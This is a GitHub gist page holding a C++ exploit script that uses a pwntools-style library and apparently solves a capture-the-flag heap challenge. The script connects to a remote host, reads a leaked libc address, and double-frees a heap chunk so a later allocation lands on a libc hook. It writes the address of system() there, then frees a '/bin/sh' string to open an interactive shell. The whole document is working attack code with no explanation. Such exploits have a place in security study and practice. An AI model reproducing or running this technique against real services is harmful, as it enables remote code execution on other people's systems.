Skip to content

Instantly share code, notes, and snippets.

@hkraw
Created February 21, 2021 10:39
Show Gist options
  • Save hkraw/68a4352d062ff1c00551a730b6f32fa9 to your computer and use it in GitHub Desktop.
Save hkraw/68a4352d062ff1c00551a730b6f32fa9 to your computer and use it in GitHub Desktop.
#include <pwntools>
#include <string>
#include <vector>
#include <iostream>
using namespace pwn;
//auto io = Process("./a.out");
auto io = Remote("65.1.92.179", 49155);
void add(uint32_t idx, uint32_t size, const std::string& bytes) {
io.sendlineafter("exit\n", "1");
io.sendlineafter("index: ",std::to_string(idx));
io.sendlineafter("size: ",std::to_string(size));
io.sendlineafter("input: ",bytes);
}
void rem(uint32_t idx) {
io.sendlineafter("exit\n","2");
io.sendlineafter("index: ",std::to_string(idx));
}
int main() {
io.recvuntil("gift: ");
uint64_t libc_leak = Int(io.recvline().substr(0, 14), 16);
uint64_t libc_base = libc_leak - 0xb65b0;
std::cout << "[+] Libc base: 0x" << std::hex << libc_base << std::endl;
add(0, 0x18, "HKHK");
add(1, 0x18, "HKHK");
rem(1);
rem(1);
add(0, 0x18, p64(libc_base + 0x3ed8e8));
add(0, 0x18, "/bin/sh");
add(1, 0x18, p64(libc_base + 0x4f4e0));
rem(0);
io.interactive();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment